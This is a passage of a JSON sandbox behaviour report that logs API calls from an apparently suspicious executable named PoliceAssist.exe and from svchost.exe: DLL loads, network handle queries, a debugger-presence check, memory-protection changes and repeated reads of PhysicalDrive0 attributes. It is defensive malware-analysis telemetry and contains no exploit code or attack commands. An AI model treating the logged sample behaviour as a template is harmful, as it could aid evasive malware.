"network", "api": "WinHttpQueryHeaders", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x009769d0" } ], "repeated": 0, "id": 1970 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\mlang" }, { "name": "DllBase", "value": "0x7ffec5430000" } ], "repeated": 0, "id": 1971 }, { "timestamp": "2025-11-20 10:58:35,609", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\mlang.dll" }, { "name": "BaseAddress", "value": "0x7ffec5430000" } ], "repeated": 0, "id": 1972 }, { "timestamp": "2025-11-20 10:58:35,609", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "275C23E2-3747-11D0-9FEA-00AA003F8646" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "275C23E1-3747-11D0-9FEA-00AA003F8646" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 1973 }, { "timestamp": "2025-11-20 10:58:35,609", "thread_id": "2188", "caller": "0x14001f728", "parentcaller": "0x14003ee1c", "category": "misc", "api": "FindResourceExW", "status": true, "return": "0x1401313e0", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "Type", "value": "#14" }, { "name": "Name", "value": "#206" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 1974 }, { "timestamp": "2025-11-20 10:58:35,609", "thread_id": "2188", "caller": "0x14001f728", "parentcaller": "0x14003ee1c", "category": "misc", "api": "LoadResource", "status": true, "return": "0x1401391cc", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x1401313e0" } ], "repeated": 0, "id": 1975 }, { "timestamp": "2025-11-20 10:58:35,609", "thread_id": "2188", "caller": "0x14001f728", "parentcaller": "0x14003ee1c", "category": "misc", "api": "FindResourceExW", "status": true, "return": "0x140131340", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "Type", "value": "#3" }, { "name": "Name", "value": "#4" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 1976 }, { "timestamp": "2025-11-20 10:58:35,609", "thread_id": "2188", "caller": "0x14001f728", "parentcaller": "0x14003ee1c", "category": "misc", "api": "LoadResource", "status": true, "return": "0x140134f10", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x140131340" } ], "repeated": 0, "id": 1977 }, { "timestamp": "2025-11-20 10:58:35,609", "thread_id": "2188", "caller": "0x14001f744", "parentcaller": "0x14003ee1c", "category": "windows", "api": "FindWindowW", "status": true, "return": "0x00010098", "arguments": [ { "name": "ClassName", "value": "Shell_TrayWnd" }, { "name": "WindowName", "value": "" } ], "repeated": 0, "id": 1978 }, { "timestamp": "2025-11-20 10:58:35,625", "thread_id": "2188", "caller": "0x1400b404f", "parentcaller": "0x140037c90", "category": "windows", "api": "PostMessageW", "status": true, "return": "0x00000001", "arguments": [ { "name": "WindowHandle", "value": "0x000b02a0" }, { "name": "Message", "value": "0x00000044" } ], "repeated": 0, "id": 1979 }, { "timestamp": "2025-11-20 10:58:35,656", "thread_id": "2188", "caller": "0x1400b4073", "parentcaller": "0x140037c90", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "comctl32.dll" }, { "name": "BaseAddress", "value": "0x7ffecf5a0000" } ], "repeated": 1, "id": 1980 }, { "timestamp": "2025-11-20 10:58:35,672", "thread_id": "2188", "caller": "0x1400b4073", "parentcaller": "0x140037c90", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\ntmarta" }, { "name": "DllBase", "value": "0x7ffedfcb0000" } ], "repeated": 0, "id": 1981 }, { "timestamp": "2025-11-20 10:58:35,672", "thread_id": "2188", "caller": "0x1400b4073", "parentcaller": "0x140037c90", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\CoreMessaging" }, { "name": "DllBase", "value": "0x7ffede0b0000" } ], "repeated": 0, "id": 1982 }, { "timestamp": "2025-11-20 10:58:35,672", "thread_id": "2188", "caller": "0x1400b4073", "parentcaller": "0x140037c90", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wintypes" }, { "name": "DllBase", "value": "0x7ffedc8a0000" } ], "repeated": 0, "id": 1983 }, { "timestamp": "2025-11-20 10:58:35,672", "thread_id": "2188", "caller": "0x1400b4073", "parentcaller": "0x140037c90", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\CoreUIComponents" }, { "name": "DllBase", "value": "0x7ffeddd50000" } ], "repeated": 0, "id": 1984 }, { "timestamp": "2025-11-20 10:58:35,672", "thread_id": "2188", "caller": "0x1400b4073", "parentcaller": "0x140037c90", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\textinputframework" }, { "name": "DllBase", "value": "0x7ffed8f50000" } ], "repeated": 0, "id": 1985 }, { "timestamp": "2025-11-20 10:58:35,687", "thread_id": "2188", "caller": "0x1400b2754", "parentcaller": "0x140056af0", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\msctf.dll" }, { "name": "BaseAddress", "value": "0x7ffee21a0000" } ], "repeated": 0, "id": 1986 }, { "timestamp": "2025-11-20 10:59:16,219", "thread_id": "4536", "caller": "0x7ffee0bdc7dd", "parentcaller": "0x7ffee34e865b", "category": "registry", "api": "RegNotifyChangeKeyValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\" }, { "name": "NotifyFilter", "value": "0x10000004" }, { "name": "WatchSubtree", "value": "0" }, { "name": "Asynchronous", "value": "1" } ], "repeated": 1, "id": 1987 }, { "timestamp": "2025-11-20 10:59:24,047", "thread_id": "1596", "caller": "0x7ffec77bf96a", "parentcaller": "0x7ffee34e16e9", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1988 }, { "timestamp": "2025-11-20 10:59:25,812", "thread_id": "1704", "caller": "0x7ffee34c467e", "parentcaller": "0x7ffee34c3748", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "12" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "1704" } ], "repeated": 0, "id": 1989 }, { "timestamp": "2025-11-20 10:59:25,812", "thread_id": "2336", "caller": "0x7ffee34c469e", "parentcaller": "0x7ffee34c3748", "category": "threading", "api": "NtTerminateThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000000" }, { "name": "ExitStatus", "value": "0x00000000" }, { "name": "ThreadId", "value": "0" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 1990 }, { "timestamp": "2025-11-20 10:59:25,812", "thread_id": "3704", "caller": "0x7ffee34c467e", "parentcaller": "0x7ffee34c3748", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "12" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "3704" } ], "repeated": 0, "id": 1991 }, { "timestamp": "2025-11-20 10:59:25,812", "thread_id": "3704", "caller": "0x7ffee34c469e", "parentcaller": "0x7ffee34c3748", "category": "threading", "api": "NtTerminateThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000000" }, { "name": "ExitStatus", "value": "0x00000000" }, { "name": "ThreadId", "value": "0" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 1992 }, { "timestamp": "2025-11-20 10:59:28,437", "thread_id": "1596", "caller": "0x7ffee3347042", "parentcaller": "0x7ffee3346fa4", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004ac" } ], "repeated": 0, "id": 1993 }, { "timestamp": "2025-11-20 10:59:28,437", "thread_id": "1596", "caller": "0x7ffee3347042", "parentcaller": "0x7ffee3346fa4", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000304" } ], "repeated": 0, "id": 1994 }, { "timestamp": "2025-11-20 10:59:28,437", "thread_id": "1596", "caller": "0x7ffee3347042", "parentcaller": "0x7ffee3346fa4", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b8" } ], "repeated": 0, "id": 1995 }, { "timestamp": "2025-11-20 10:59:32,875", "thread_id": "2432", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000304" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 1996 }, { "timestamp": "2025-11-20 11:00:14,031", "thread_id": "1596", "caller": "0x7ffec77bf96a", "parentcaller": "0x7ffee34e16e9", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1997 }, { "timestamp": "2025-11-20 11:00:24,047", "thread_id": "1596", "caller": "0x7ffec77c2f51", "parentcaller": "0x7ffec77c2e76", "category": "network", "api": "shutdown", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "how", "value": "1" } ], "repeated": 0, "id": 1998 }, { "timestamp": "2025-11-20 11:00:24,047", "thread_id": "1596", "caller": "0x7ffec77c2f60", "parentcaller": "0x7ffec77c2e76", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1999 }, { "timestamp": "2025-11-20 11:00:24,047", "thread_id": "3408", "caller": "0x7ffee0a47358", "parentcaller": "0x7ffee0a470ef", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "0", "pretty_value": "ThreadBasicInformation" }, { "name": "ThreadInformation", "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00P\r\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "3408" } ], "repeated": 0, "id": 2000 }, { "timestamp": "2025-11-20 11:00:34,047", "thread_id": "3408", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffed8a51ba7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000454" } ], "repeated": 0, "id": 2001 }, { "timestamp": "2025-11-20 11:00:36,219", "thread_id": "2432", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee2fe3081", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000032c" } ], "repeated": 0, "id": 2002 }, { "timestamp": "2025-11-20 11:00:39,812", "thread_id": "4488", "caller": "0x7ffee34c467e", "parentcaller": "0x7ffee34c3748", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "12" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "4488" } ], "repeated": 0, "id": 2003 }, { "timestamp": "2025-11-20 11:00:39,812", "thread_id": "4488", "caller": "0x7ffee34c469e", "parentcaller": "0x7ffee34c3748", "category": "threading", "api": "NtTerminateThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000000" }, { "name": "ExitStatus", "value": "0x00000000" }, { "name": "ThreadId", "value": "0" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 2004 }, { "timestamp": "2025-11-20 11:01:04,016", "thread_id": "3408", "caller": "0x7ffec77bf96a", "parentcaller": "0x7ffee34e16e9", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 2005 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee2fe2f2d", "parentcaller": "0x7ffee2fe2d59", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "16" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "2432" } ], "repeated": 0, "id": 2006 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee2fe2ec5", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000032c" } ], "repeated": 0, "id": 2007 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee2f6cd6e", "parentcaller": "0x7ffee2fe2ed4", "category": "system", "api": "IsDebuggerPresent", "status": false, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 2008 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee2fe4324", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000310" } ], "repeated": 0, "id": 2009 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee34c467e", "parentcaller": "0x7ffee110f79a", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "12" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "2432" } ], "repeated": 0, "id": 2010 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1831000" }, { "name": "ModuleName", "value": "ole32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 2011 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1831000" }, { "name": "ModuleName", "value": "ole32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 2012 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee2fe722d", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000324" } ], "repeated": 0, "id": 2013 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee2fe723d", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000328" } ], "repeated": 0, "id": 2014 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee339e41e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000304" } ], "repeated": 0, "id": 2015 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee339e4e4", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b8" } ], "repeated": 0, "id": 2016 }, { "timestamp": "2025-11-20 11:01:35,594", "thread_id": "2432", "caller": "0x7ffee34c469e", "parentcaller": "0x7ffee110f79a", "category": "threading", "api": "NtTerminateThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000000" }, { "name": "ExitStatus", "value": "0x00000000" }, { "name": "ThreadId", "value": "0" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 2017 } ], "threads": [ "2188", "2060", "1600", "404", "3824", "2432", "1596", "3408", "4536", "1704", "2336", "3704", "4488" ], "environ": { "UserName": "Admin", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "\"C:\\Temp\\PoliceAssist.exe\" ", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x140000000", "MainExeSize": "0x0013a000", "Bitness": "64-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } }, { "process_id": 740, "process_name": "svchost.exe", "parent_id": 600, "module_path": "C:\\Windows\\System32\\svchost.exe", "first_seen": "2025-11-20 10:58:26,323", "calls": [ { "timestamp": "2025-11-20 10:58:29,792", "thread_id": "912", "caller": "0x7ffee10ec5f2", "parentcaller": "0x7ffee10e89f3", "category": "process", "api": "NtCreateUserProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x00000e5c" }, { "name": "ThreadHandle", "value": "0x00000eb4" }, { "name": "ProcessDesiredAccess", "value": "0x02000000" }, { "name": "ThreadDesiredAccess", "value": "0x02000000" }, { "name": "ProcessFileName", "value": "" }, { "name": "ThreadName", "value": "" }, { "name": "ImagePathName", "value": "C:\\Windows\\system32\\wbem\\wmiprvse.exe" }, { "name": "CommandLine", "value": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" }, { "name": "DllPath", "value": "" }, { "name": "ProcessId", "value": "140728898423900" } ], "repeated": 0, "id": 0 }, { "timestamp": "2025-11-20 10:58:30,636", "thread_id": "324", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000f0c" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1 }, { "timestamp": "2025-11-20 10:58:31,557", "thread_id": "912", "caller": "0x7ffee10e89f3", "parentcaller": "0x7ffee167de30", "category": "process", "api": "CreateProcessInternalW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ApplicationName", "value": "C:\\Windows\\system32\\wbem\\wmiprvse.exe" }, { "name": "CommandLine", "value": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" }, { "name": "CreationFlags", "value": "0x00000010", "pretty_value": "CREATE_NEW_CONSOLE" }, { "name": "ProcessId", "value": "3164" }, { "name": "ThreadId", "value": "1388" }, { "name": "ProcessHandle", "value": "0x00000e5c" }, { "name": "ThreadHandle", "value": "0x00000eb4" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 2 }, { "timestamp": "2025-11-20 10:58:35,698", "thread_id": "912", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee10be6a1", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\rsaenh.dll" }, { "name": "BaseAddress", "value": "0x7ffedfb90000" } ], "repeated": 0, "id": 3 }, { "timestamp": "2025-11-20 10:58:35,932", "thread_id": "2872", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffede9ab182", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0x00000f00" }, { "name": "SourceHandle", "value": "0x000007ec" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000dc4" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-11-20 10:58:35,932", "thread_id": "2872", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffede9ab182", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0x00000ea8" }, { "name": "SourceHandle", "value": "0x000007ec" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000dc4" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 5 }, { "timestamp": "2025-11-20 10:58:37,839", "thread_id": "2872", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffede9abe00", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0x00000dc4" }, { "name": "TargetProcessHandle", "value": "0x00000f00" }, { "name": "TargetHandle", "value": "0x00000dc4" }, { "name": "Options", "value": "0x00000003" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-11-20 10:58:40,636", "thread_id": "2872", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000f18" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 1, "id": 7 }, { "timestamp": "2025-11-20 10:59:00,011", "thread_id": "2872", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffede9ab182", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0x00000dc4" }, { "name": "SourceHandle", "value": "0x000007ec" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000f00" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 8 }, { "timestamp": "2025-11-20 10:59:00,011", "thread_id": "2872", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffede9ab182", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0x00000ea8" }, { "name": "SourceHandle", "value": "0x000007ec" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000f00" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 9 }, { "timestamp": "2025-11-20 10:59:00,651", "thread_id": "2872", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000dc4" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 10 }, { "timestamp": "2025-11-20 10:59:10,636", "thread_id": "2872", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000eb0" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 11 }, { "timestamp": "2025-11-20 10:59:20,636", "thread_id": "324", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000a5c" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 12 }, { "timestamp": "2025-11-20 10:59:30,636", "thread_id": "324", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000f14" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 13 }, { "timestamp": "2025-11-20 10:59:40,636", "thread_id": "2872", "caller": "0x7ffee10c6579", "parentcaller": "0x7ffee10c5fe6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000f08" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PhysicalDrive0" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 1, "id": 14 }, { "timestamp": "2025-11-20 11:00:00,011", "thread_id": "324", 